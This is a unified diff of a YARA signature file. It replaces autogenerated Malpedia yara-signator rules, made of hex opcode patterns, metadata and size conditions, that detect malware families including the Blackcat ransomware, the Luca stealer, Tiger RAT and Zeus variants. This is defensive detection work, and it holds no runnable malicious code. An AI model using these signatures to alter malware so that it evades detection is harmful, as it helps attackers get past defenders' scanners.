+		$sequence_2 = { 68???????? 8d85f4fdffff 50 ff15???????? 8d85ecfbffff 50 }
+		$sequence_3 = { 7443 68???????? 8d842448020000 50 ffd6 85c0 7438 }
+		$sequence_4 = { 68???????? 6a01 6a01 68???????? e8???????? ba01000080 8bc8 }
+		$sequence_5 = { 668b044510984200 8b4dfc 6689044e 33c0 ff4d0c 75d2 8b4dfc }
+		$sequence_6 = { e8???????? 8b442450 8944240c 8d44240c 50 8bfe 8d442450 }
+		$sequence_7 = { 68???????? 50 6801000080 e8???????? e8???????? 3d09030000 7515 }
+		$sequence_8 = { ff15???????? 83c410 6a00 ff742434 68???????? e8???????? c644245c00 }
+		$sequence_9 = { 8d442424 50 8b442424 68???????? 57 895c2448 }
 
 	condition:
-		7 of them and filesize < 577536
+		7 of them and filesize < 456704
 }
-rule MALPEDIA_Win_Meltingclaw_Auto : FILE
+rule MALPEDIA_Elf_Blackcat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4c934307-6162-5bd3-9838-14fb4893e749"
+		id = "73330468-751f-50b4-b552-0b9e2c8419d0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.meltingclaw"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.meltingclaw_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackcat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/elf.blackcat_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "b6f3eb32e00edec50809c43ad1e4398bb12b63738a427d7db6e1e036df7e69e8"
-		score = 75
-		quality = 75
+		logic_hash = "ed5b892df40ee57ffa43026084cc0b81998de922d2939024f186c2c4f53be22e"
+		score = 60
+		quality = 45
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -118787,32 +118821,32 @@ rule MALPEDIA_Win_Meltingclaw_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f8484000000 ffc1 4c63e1 498bcc e8???????? }
-		$sequence_1 = { 488d8da8000000 48ffc9 48ffc1 803900 }
-		$sequence_2 = { 33c9 ff15???????? 488d8d80000000 8bd8 e8???????? }
-		$sequence_3 = { 8bfa 488bd9 33d2 41b804010000 488d4c2470 e8???????? 660f6f05???????? }
-		$sequence_4 = { 488364243000 4533c9 44896c2428 4533c0 8364242000 }
-		$sequence_5 = { 880411 48ffc2 84c0 75f3 488d8da8000000 }
-		$sequence_6 = { 23c1 41c1ff0c 2bc2 448bf0 418d6f01 4883ffff }
-		$sequence_7 = { 80c121 418809 49ffc1 b90d000000 490fbe41ff 33d2 }
-		$sequence_8 = { 750e 48396928 7508 48396930 b001 7403 }
-		$sequence_9 = { 6bc83f 49c70700010000 80c121 418809 49ffc1 b90b000000 }
+		$sequence_0 = { 7227 b803000000 81fa???????? 721a }
+		$sequence_1 = { b903000000 81fa???????? 721a b904000000 81fa???????? 720d }
+		$sequence_2 = { 08d9 80f901 750e 84c0 }
+		$sequence_3 = { 83f801 0f95c0 20c8 0fb6e8 }
+		$sequence_4 = { 721a b904000000 81fa???????? 720d }
+		$sequence_5 = { e8???????? 0f0b 90 90 90 55 53 }
+		$sequence_6 = { e8???????? 0f0b 90 90 90 90 53 }
+		$sequence_7 = { 5d c3 e8???????? 0f0b 90 90 90 }
+		$sequence_8 = { 762a 0fb6c8 8d1489 8d0cd1 c1e90c 6bd164 }
+		$sequence_9 = { 7227 b803000000 81fa???????? 721a b804000000 81fa???????? }
 
 	condition:
-		7 of them and filesize < 348160
+		7 of them and filesize < 8011776
 }
-rule MALPEDIA_Win_Evilconwi_Auto : FILE
+rule MALPEDIA_Win_Fast_Pos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7f652ca8-a434-5be9-ae21-4e0e49d2fcee"
+		id = "057c36f1-0a19-594b-99bb-5ac5d28c2830"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilconwi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.evilconwi_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fast_pos_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "212869a6ab86c4f0f11665af7cc6fecf827786dd09d766a1df9e90f9f4dd950f"
+		logic_hash = "bb07ee6c2efdd43c16301c1c39c93cc562e35ab0089f1712602de2983cb204bb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118826,32 +118860,32 @@ rule MALPEDIA_Win_Evilconwi_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c8ff eb07 8b04cd54e14000 5f 5e 5b }
-		$sequence_1 = { eb3d 8b0b 894dfc 8d048dac1b4100 8b30 90 }
-		$sequence_2 = { c700???????? 8b4508 898850030000 8b4508 59 c7404898134100 8b4508 }
-		$sequence_3 = { 56 57 8d1c85f01e4100 8b03 8b15???????? 83cfff }
-		$sequence_4 = { 72eb 6a00 ff75e4 ff15???????? ff75d0 }
-		$sequence_5 = { 50 6a00 6a0b ff75f8 ffd7 85c0 0f84a6000000 }
-		$sequence_6 = { 660f58e0 660fc5c400 25f0070000 660f28a060f74000 660f28b850f34000 }
-		$sequence_7 = { 8b45fc 03148d781f4100 8b00 894218 8a03 884228 }
-		$sequence_8 = { 50 8d45fc c745dc04000000 50 6a00 6a0b }
-		$sequence_9 = { 8b04bd781f4100 807c302900 7504 32c0 eb1a 8d45fc 50 }
+		$sequence_0 = { 56 8b7510 c745fc00000000 57 8bf9 85f6 792b }
+		$sequence_1 = { 50 68???????? 56 c7857cffffff01000000 e8???????? }
+		$sequence_2 = { ffb5e8feffff ff15???????? 85c0 7517 }
+		$sequence_3 = { 5d c20c00 81feffffff7f 7ecf eb33 8b49f0 }
+		$sequence_4 = { 8bec 8b4508 53 56 8bd9 8b30 }
+		$sequence_5 = { e8???????? 6a10 68???????? 68???????? 6a00 ff15???????? 6a00 }
+		$sequence_6 = { 6a64 8d4580 c745fc00000000 50 89b578ffffff c7857cffffff00000000 ff15???????? }
+		$sequence_7 = { 0f9485ebfeffff 83c2f0 83cfff 8bc7 8d4a0c f00fc101 48 }
+		$sequence_8 = { 56 c785e8feffff01000000 e8???????? 83c40c 8bc6 }
+		$sequence_9 = { e8???????? ff30 ff15???????? 8b95e4feffff 8bcf }
 
 	condition:
-		7 of them and filesize < 172032
+		7 of them and filesize < 327680
 }
-rule MALPEDIA_Win_Goopic_Auto : FILE
+rule MALPEDIA_Win_Clambling_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3dc4c257-a5c8-5a4d-ab14-c83ca28cb2ec"
+		id = "76c3ecc2-3249-54dd-85de-02fe8ad874ce"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.goopic"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.goopic_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.clambling"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.clambling_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "44b46e1ba9017c5fbd258e5f68a3335c35049c2540cd88d9310017d21c5cf5d5"
+		logic_hash = "95ebecd5667958656960c5343bf195152cd54c7954e81daf96b602e90195edba"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118865,32 +118899,32 @@ rule MALPEDIA_Win_Goopic_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89742414 ff15???????? 50 ff15???????? 85c0 7427 }
-		$sequence_1 = { 0f84c6000000 833d????????00 740d 8d85f0fdffff 50 }
-		$sequence_2 = { 85c0 7411 e8???????? ba01000000 }
-		$sequence_3 = { c785d0fdffff2c020000 ff15???????? 8bf0 8d85d0fdffff 50 56 89b5ccfdffff }
-		$sequence_4 = { 58 6bc000 c7803430400002000000 6a04 58 }
-		$sequence_5 = { 68???????? 6a01 6a00 68???????? ff15???????? 85c0 0f888e000000 }
-		$sequence_6 = { be00010000 33c0 66c787000100000000 8801 8d4901 40 663bc6 }
-		$sequence_7 = { ffd7 e8???????? e8???????? 8bd6 }
-		$sequence_8 = { b9???????? e8???????? 83c404 8d85f8dfffff }
-		$sequence_9 = { c785c0fdffff305d4000 eb0a c785c0fdffff245d4000 8d85b4fdffff c785c4fdffff3c5d4000 50 }
+		$sequence_0 = { 3bc6 746f 488d8424a8010000 448d4612 488d8c24a0010000 }
+		$sequence_1 = { 44896c2428 895c2420 e8???????? e9???????? ff15???????? 3bc6 }
+		$sequence_2 = { 440fb75c2440 66453bdd 7f0b 0fb7442442 66413bc7 }
+		$sequence_3 = { 7507 66893d???????? 488b0d???????? 488d542430 ff15???????? 448b442430 33d2 }
+		$sequence_4 = { 7412 48ffc3 4883c010 4881fb00040000 }
+		$sequence_5 = { ffd0 483bdf 7409 488bcb ff15???????? 33c0 488b5c2438 }
+		$sequence_6 = { 4c8d442470 8d5601 4889442420 ff15???????? }
+		$sequence_7 = { 488b542470 488b8c24a8010000 ff15???????? 8907 eb08 ff15???????? }
+		$sequence_8 = { 8bc3 eb02 33c0 4883c470 415d 5f }
+		$sequence_9 = { 893d???????? ff15???????? 3bc7 7507 66893d???????? }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 412672
 }
-rule MALPEDIA_Win_Unidentified_078_Auto : FILE
+rule MALPEDIA_Win_Hi_Zor_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "be01d120-44f2-52e2-a1fa-8d3ce9aeac2c"
+		id = "cc3751c1-3c9f-5c03-98ac-f7ffbc0daf9f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_078"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_078_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hi_zor_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hi_zor_rat_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "e6046ec69321f4df1e212f93ebf4122d030058a32e3fabef5fe6e0f5f1575a85"
+		logic_hash = "71847819d2d9074c6684d2c1f561750135c21371e8d9757a34aa466c08b5e5fd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118904,32 +118938,32 @@ rule MALPEDIA_Win_Unidentified_078_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f8412010000 0f8cee000000 80fa0d 0f8421010000 80fa1b 0f8576010000 }
-		$sequence_1 = { 0f8d94010000 80fa26 0f8f18010000 80fa23 0f8d82010000 }
-		$sequence_2 = { 80fa5c 0f94c1 80fa2f 0f94c2 08d1 }
-		$sequence_3 = { 3c18 0f8483000000 3c1c 740d 3c16 }
-		$sequence_4 = { e9???????? 80fa0c 0f8412010000 0f8cee000000 80fa0d }
-		$sequence_5 = { 89d6 0f883a020000 80fa21 0f8f8f000000 80fa20 0f8d28020000 }
-		$sequence_6 = { a910000108 753f a900004011 7521 a900000600 7467 }
-		$sequence_7 = { ff15???????? 85c0 740e e8???????? 31d2 89c1 e8???????? }
-		$sequence_8 = { b901010000 ff15???????? 85c0 740e }
-		$sequence_9 = { 0f8421010000 80fa1b 0f8576010000 ba02000000 e8???????? }
+		$sequence_0 = { 235014 0bda 8b501c 03df 8d9413aff7448b 8bde }
+		$sequence_1 = { 83c002 6685c9 75f5 8dbdc8f6ffff 2bc2 83c7fe 668b4f02 }
+		$sequence_2 = { c1e611 0bd6 03501c 8bfa f7d7 237810 23da }
+		$sequence_3 = { 33db 68fe0f0000 8d94248e080000 33c9 53 52 }
+		$sequence_4 = { 8bf8 52 57 ff15???????? 8b4d0c 8b5508 6a00 }
+		$sequence_5 = { 6a00 8bf0 8d45f0 50 56 6a00 }
+		$sequence_6 = { 25ffffff1f 03c0 6a40 03c0 c1ea1d }
+		$sequence_7 = { 50 89bb40010000 89bd58ffffff ff15???????? }
+		$sequence_8 = { 035858 8975fc 8b701c 8d9c335314c4ff 8b75f8 23f7 }
+		$sequence_9 = { 0fb6b6b4490010 ff24b594490010 52 53 8bf9 e8???????? 5f }
 
 	condition:
-		7 of them and filesize < 688128
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Zeus_Openssl_Auto : FILE
+rule MALPEDIA_Win_Wonknu_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d31ed497-e4a7-5163-b5e5-7492582406ac"
+		id = "5d7ac694-4f51-5dc8-9ab7-ab21fb225c95"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_openssl"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zeus_openssl_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wonknu_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "16a4630d182e49d69e9e6276c110ddae0774c12808dbb665512c7a33855cd109"
+		logic_hash = "e2ca1c08f61486fefbae5d981f9ebfcfe0d01c7d31c8206cfd558443ffe8ed91"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118943,32 +118977,32 @@ rule MALPEDIA_Win_Zeus_Openssl_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bf8 05fffeffff 4e 03c6 }
-		$sequence_1 = { 0181a8160000 837de000 7419 8b75e0 8b45f0 0fb7443002 8b75f8 }
-		$sequence_2 = { 2bc3 8bda 8b55c4 83c005 894304 8b45f0 2bd6 }
-		$sequence_3 = { 6a1c 8945f0 8845ff 8bfa 32c0 59 }
-		$sequence_4 = { 8bec 83ec10 53 56 57 8b3d???????? 33db }
-		$sequence_5 = { 83ec0c 56 57 8bf2 8bf9 e8???????? }
-		$sequence_6 = { 83c408 8b87bc160000 894df8 83f810 7530 8b4f14 }
-		$sequence_7 = { 743b 83ef50 7412 83ef75 742a }
-		$sequence_8 = { 89475c e8???????? 8b0f 33c0 394110 5f }
-		$sequence_9 = { 8b45fc 48 50 8d9694000000 8bce }
+		$sequence_0 = { 53 56 57 6804140000 }
+		$sequence_1 = { f3a5 8bcb e8???????? 803b00 }
+		$sequence_2 = { 8bfc b901050000 f3a5 8bcb e8???????? 803b00 }
+		$sequence_3 = { e8???????? 8bfc b901050000 f3a5 8bcb e8???????? }
+		$sequence_4 = { e8???????? 8bfc b901050000 f3a5 8bcb e8???????? 803b00 }
+		$sequence_5 = { c6840550ffffff00 8d8550ffffff 50 e8???????? }
+		$sequence_6 = { 8bfc b901050000 f3a5 8bcb e8???????? }
+		$sequence_7 = { 8d7e28 57 ff15???????? 8b4608 }
+		$sequence_8 = { b901050000 f3a5 8bcb e8???????? 803b00 }
+		$sequence_9 = { eb08 c6840550ffffff00 8d8550ffffff 50 e8???????? }
 
 	condition:
-		7 of them and filesize < 4546560
+		7 of them and filesize < 540672
 }
-rule MALPEDIA_Win_Luca_Stealer_Auto : FILE
+rule MALPEDIA_Win_Thunderx_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "962fd693-32a3-53ad-92cd-b5debbabca20"
+		id = "2518ca7c-7e0a-565b-be3c-84d244188fab"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.luca_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.luca_stealer_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunderx"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.thunderx_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "41100df83b0cacd06b9716ae5b8e2710b883cf9f1a3da041c06d57097240cc33"
+		logic_hash = "4292a9f6c1d3812002d780fdcc81ab5726cfcf5e40c47b2cebcf85c542667c9b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118982,32 +119016,32 @@ rule MALPEDIA_Win_Luca_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb0a f6471280 7504 6683e914 4d85f6 7416 6641395e10 }
-		$sequence_1 = { e8???????? 85c0 7428 85db 7524 488d0daee71600 e8???????? }
-		$sequence_2 = { e9???????? 4156 56 57 53 4883ec28 83791803 }
-		$sequence_3 = { e8???????? 4c8d4768 4889f1 ba03003000 e8???????? 4883c770 4889f1 }
-		$sequence_4 = { eb06 492130 412131 488b5c2430 8bc6 488b742438 488b7c2440 }
-		$sequence_5 = { 8d507e 448d4301 e8???????? 8b442458 448d4301 448bce 89442420 }
-		$sequence_6 = { e9???????? 48b8af39a3b04c5dea12 c3 56 4883ec20 4889ce 89f0 }
-		$sequence_7 = { ff15???????? 4438bfa8010000 740c 488b8fe8010000 e8???????? 488bcf e8???????? }
-		$sequence_8 = { e8???????? 488d8d60110000 e8???????? 488d8d501f0000 e8???????? 488d15683a2c00 488db560110000 }
-		$sequence_9 = { e9???????? 488d542468 48c70205000000 e9???????? 488d542468 48c70202000000 eb7d }
+		$sequence_0 = { 56 e8???????? 59 8d45b0 8bcf 50 e8???????? }
+		$sequence_1 = { 75f2 85c9 7509 3bc6 740b 83e802 ebd7 }
+		$sequence_2 = { 8bcb e8???????? 83c318 83c618 895de0 3bf7 75eb }
+		$sequence_3 = { 8b35???????? ffd6 ff75ec ffd6 b001 eb02 32c0 }
+		$sequence_4 = { 7462 8b44240c 3b05???????? 7556 8b442410 89442438 8b442414 }
+		$sequence_5 = { c3 6a54 b8???????? e8???????? 8bf9 897dac }
+		$sequence_6 = { 7415 ff15???????? 85c0 750b e8???????? 84c0 }
+		$sequence_7 = { 59 56 8bd0 885dfc 8d8d40feffff e8???????? 59 }
+		$sequence_8 = { e8???????? 8d8dc8fdffff e8???????? 8d8db0fdffff c645fc05 e8???????? }
+		$sequence_9 = { 8bfa 2b7d0c eb02 8bfe }
 
 	condition:
-		7 of them and filesize < 9285632
+		7 of them and filesize < 319488
 }
-rule MALPEDIA_Win_Downdelph_Auto : FILE
+rule MALPEDIA_Win_Montysthree_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4f6b1d19-3f1f-5f81-9e45-1d0b60961ede"
+		id = "87f022dd-6806-53c4-b097-b12b0a06ec92"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.downdelph_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.montysthree"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.montysthree_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "eae4c367be0b783aacccaf67139d8191ef5e286d3c53b64319eee5bb00fa728e"
+		logic_hash = "49338e71bc632a417705dbca9be5623cbd05fe63eacf0615bb9fcdc5a3ff20f5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119021,32 +119055,32 @@ rule MALPEDIA_Win_Downdelph_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b0d???????? ba???????? e8???????? 8b55d4 8d45d8 }
-		$sequence_1 = { 8d45f0 e8???????? 8d45e4 33c9 ba08000000 e8???????? 8b45f4 }
-		$sequence_2 = { 8d45f4 ba02000000 e8???????? 8d45fc 8b15???????? }
-		$sequence_3 = { 7c66 46 33db 8d45c0 }
-		$sequence_4 = { 8b14b0 8d45e0 b9???????? e8???????? 8b55e0 8d45e4 e8???????? }
-		$sequence_5 = { 8d45f8 e8???????? 8b55f8 8d45fc 8b4dfc e8???????? 8bc3 }
-		$sequence_6 = { 7409 8b12 50 e8???????? 58 83e808 e8???????? }
-		$sequence_7 = { 33c9 ba04010000 e8???????? 8d45f8 }
-		$sequence_8 = { 81ce00ffffff 46 0fb68c35bcfeffff 884df7 889435bcfeffff }
-		$sequence_9 = { 8d45e4 ba03000000 e8???????? 8b55e4 8d45fc }
+		$sequence_0 = { 3c09 7443 3c0d 743f 3c20 743b }
+		$sequence_1 = { 5f 85f6 5e 0f94c0 5b c9 }
+		$sequence_2 = { 8d4d08 e8???????? ff30 6a6d ebac 66395f04 7629 }
+		$sequence_3 = { c745f010000000 ff15???????? 85c0 8b35???????? 756e ffd6 3d16000980 }
+		$sequence_4 = { 83ec18 68???????? e8???????? 59 8d4de8 e8???????? }
+		$sequence_5 = { 68???????? e8???????? 33f6 8975fc 3935???????? 0f850a010000 56 }
+		$sequence_6 = { 397dc8 7427 837dc802 7421 68???????? }
+		$sequence_7 = { 56 57 ff7510 33ff ff750c 33f6 }
+		$sequence_8 = { 885d77 f6456c02 7408 8d4d3c e8???????? 385d77 }
+		$sequence_9 = { 8d4ddc 895dfc e8???????? 395d08 742c 53 8d45fc }
 
 	condition:
-		7 of them and filesize < 172032
+		7 of them and filesize < 458752
 }
-rule MALPEDIA_Win_Touchmove_Auto : FILE
+rule MALPEDIA_Win_Tiger_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "522c2cac-142c-5982-9c6b-182b0f82e223"
+		id = "45a8f301-bb79-5b2b-bc44-a24cf96c6108"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.touchmove"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.touchmove_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiger_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tiger_rat_auto.yar#L1-L165"
 		license_url = "N/A"
-		logic_hash = "b909bee1078b375a3a52a6b366cfda1d518438076dcea1e60cd1ece67d92cd0d"
+		logic_hash = "86fb8964d90e4f85207407bd6a1343f7cd65992f2c3c62186f5ccbef201af0b2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119060,32 +119094,38 @@ rule MALPEDIA_Win_Touchmove_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d9520030000 488bcb 488905???????? ff15???????? }
-		$sequence_1 = { c7853417000073686f74 c6853817000000 e8???????? 488d8d30290000 }
-		$sequence_2 = { c785883b0000ef911211 c7858c3b0000ff7559a3 c785903b0000e16ea064 c785943b0000b8788977 c785983b0000a0379158 }
-		$sequence_3 = { 894720 488d05fdfdffff 48894728 488d0502feffff 48894730 488d0507feffff }
-		$sequence_4 = { 4c8d05d4acffff 89542420 83fa05 7d15 4863ca }
-		$sequence_5 = { 7577 c744246000010000 488d442460 4889442428 488d8580440000 4889442420 }
-		$sequence_6 = { c785200a00006b65726e c785240a0000656c3332 c785280a00002e646c6c c6852c0a000000 e8???????? }
-		$sequence_7 = { 488bdf 4889742430 4d8d570c 4c89642428 488d2d1f660100 492bdf 0f1f4000 }
-		$sequence_8 = { 83e001 894720 488d05fdfdffff 48894728 488d0502feffff }
-		$sequence_9 = { 66c785904000006572 c6859240000000 33d2 41b8ed000000 488d8d93400000 e8???????? 660f6f2d???????? }
+		$sequence_0 = { 4883fbff 7425 48c74108ffffffff ba02000000 488bcb }
+		$sequence_1 = { 4883f8ff 740c 83caff 488bc8 ff15???????? 33c0 }
+		$sequence_2 = { 41b831000000 48895c2420 e8???????? 488bcb }
+		$sequence_3 = { 33d2 41b800020000 e8???????? c7832804000020000000 89bb30040000 48c7834c04000000000000 }
+		$sequence_4 = { 0fb745ae 663b0d???????? 750d 663b05???????? }
+		$sequence_5 = { 381a 7505 448bc3 eb11 4983c8ff 0f1f4000 }
+		$sequence_6 = { 2bef 488bcb 4c63c5 e8???????? 442be7 488bce }
+		$sequence_7 = { 49c1eb04 c0e104 0ac1 410fb6cf 0845d6 }
+		$sequence_8 = { 415f 5e c3 8b5650 33c9 41b800100000 }
+		$sequence_9 = { 4898 483de4000000 730f 488d0d1d840000 4803c0 8b04c1 eb02 }
+		$sequence_10 = { 8b4e28 4803cf e8???????? 488bbc24c0000000 }
+		$sequence_11 = { f30f7f4507 0b0d???????? 41b8d0070000 c745f74008027b }
+		$sequence_12 = { 488bdf 48c1fb05 4c8d353a1c0100 83e01f 486bf058 }
+		$sequence_13 = { 488d1578bd0000 488bcb 488905???????? ff15???????? 488bc8 ff15???????? 488d1570bd0000 }
+		$sequence_14 = { 0fb64c05b7 48ffc0 42324c05a7 4883f80f }
+		$sequence_15 = { 4c8d2d166e0100 413bff 7d77 488b0e }
 
 	condition:
-		7 of them and filesize < 224256
+		7 of them and filesize < 557056
 }
-rule MALPEDIA_Win_Purplewave_Auto : FILE
+rule MALPEDIA_Win_Glasses_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f9a895ad-7289-518b-be54-7444bb9c0feb"
+		id = "e3f60807-9e3f-553f-aab3-2b9d174a2d1f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplewave"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.purplewave_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.glasses_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "2b8c8451c42e657113c26199005fb6974947a93818322a1c2e41a19d47cbd34a"
+		logic_hash = "f8dc4024fd9ceffd71dbd3d9fead59d2a70f550a13ec78ce30cdcf445ee6a1a3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119099,32 +119139,32 @@ rule MALPEDIA_Win_Purplewave_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bc1 c1f806 83e13f 6bc938 8b0485201e4900 80640828fe ff36 }
-		$sequence_1 = { 395914 7202 8b09 85f6 7410 8bd1 66833a3a }
-		$sequence_2 = { 59 8945c0 894dc4 8845b0 8945d8 894ddc }
-		$sequence_3 = { 8bec 8b5508 56 0fb67203 0fb64202 0fb64a01 c1e608 }
-		$sequence_4 = { 8d8d14ffffff e8???????? 68???????? 8d8d14ffffff c645fc20 e8???????? 50 }
-		$sequence_5 = { 51 8d4dd4 e8???????? ff734c e8???????? 59 3bc7 }
-		$sequence_6 = { 8b4e08 8902 894a04 895004 8911 8b4508 }
-		$sequence_7 = { 8d7b04 899d5cfdffff 33c0 c703???????? 83671000 c7471407000000 668907 }
-		$sequence_8 = { 8d8d14ffffff e8???????? 68???????? 8d8d14ffffff c645fc60 e8???????? 50 }
-		$sequence_9 = { e9???????? c3 8d4db0 e9???????? 8d4dbc e9???????? 8d8df8fbffff }
+		$sequence_0 = { e8???????? 8b4d10 51 68???????? 8bce e8???????? 8d4de4 }
+		$sequence_1 = { e9???????? 8d8d38fdffff e9???????? 8d8d94feffff e9???????? 8d8dacfdffff e9???????? }
+		$sequence_2 = { ffd0 e9???????? 389d4afbffff 0f842f070000 8d8d10fbffff 889d4bfbffff e8???????? }
+		$sequence_3 = { eb05 1bc9 83d9ff 85c9 0f84643d0000 b9???????? 8d9b00000000 }
+		$sequence_4 = { eb2d 8b5520 8b451c 8d8e00090000 51 8b4d18 52 }
+		$sequence_5 = { e8???????? 8ac3 e9???????? 68???????? e9???????? 8b16 8b4214 }
+		$sequence_6 = { f3ab 8b5510 52 e8???????? 83c404 5f 5e }
+		$sequence_7 = { e9???????? 8d8df4feffff e9???????? 8d8d08ffffff e9???????? 8b542408 8d420c }
